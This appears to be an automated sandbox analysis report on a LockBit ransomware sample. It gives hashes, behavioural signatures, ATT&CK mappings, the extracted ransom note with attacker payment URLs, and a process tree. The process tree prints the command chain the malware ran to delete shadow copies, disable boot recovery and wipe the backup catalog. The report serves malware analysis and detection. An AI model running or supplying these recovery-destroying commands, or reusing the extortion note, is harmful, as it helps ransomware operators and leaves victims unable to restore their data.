Analysis

  • max time kernel
    181s
  • max time network
    81s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    08-05-2022 05:55

General

  • Target

    1474d0e701fbe05b740d7a88e64a2785c74fec9b500f0a9bc84e0d1091bd4ba8.exe

  • Size

    371KB

  • MD5

    aee36519b4b8b7a08daaaf6be304da8d

  • SHA1

    836961f5e016a2240a4088071cecb22064e1fc44

  • SHA256

    1474d0e701fbe05b740d7a88e64a2785c74fec9b500f0a9bc84e0d1091bd4ba8

  • SHA512

    bf721f5bbd7f80d1ec4d8d56cbd59ffe75f7978a902c39891a4d6e1410d957291357fcbe1b6858ad68ab36cf301930e05e28c91090bca7b8d14ecadd5cac9f93

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: 1) Through a standard browser(FireFox, Chrome, Edge, Opera) | 1. Open link http://lockbit-decryptor.top/?96B283EF5B7ACD4CAFF60AC8C075E649 | 2. Follow the instructions on this page 2) Through a Tor Browser - recommended | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?96B283EF5B7ACD4CAFF60AC8C075E649 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about
URLs

http://lockbit-decryptor.top/?96B283EF5B7ACD4CAFF60AC8C075E649

http://lockbitks2tvnmwk.onion/?96B283EF5B7ACD4CAFF60AC8C075E649

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1474d0e701fbe05b740d7a88e64a2785c74fec9b500f0a9bc84e0d1091bd4ba8.exe
    "C:\Users\Admin\AppData\Local\Temp\1474d0e701fbe05b740d7a88e64a2785c74fec9b500f0a9bc84e0d1091bd4ba8.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:912
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2044
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2964
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2976
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:2988
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1740

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Command-Line Interface

1
T1059

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

File Deletion

3
T1107

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Impact

Inhibit System Recovery

4
T1490

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/912-54-0x0000000000E0B000-0x0000000000E22000-memory.dmp
    Filesize

    92KB

  • memory/912-55-0x0000000000220000-0x0000000000246000-memory.dmp
    Filesize

    152KB

  • memory/912-56-0x0000000075711000-0x0000000075713000-memory.dmp
    Filesize

    8KB

  • memory/912-57-0x0000000000400000-0x0000000000C3A000-memory.dmp
    Filesize

    8.2MB

  • memory/1792-58-0x0000000000000000-mapping.dmp
  • memory/2044-59-0x0000000000000000-mapping.dmp
  • memory/2800-60-0x0000000000000000-mapping.dmp
  • memory/2964-61-0x0000000000000000-mapping.dmp
  • memory/2976-62-0x0000000000000000-mapping.dmp
  • memory/2988-63-0x0000000000000000-mapping.dmp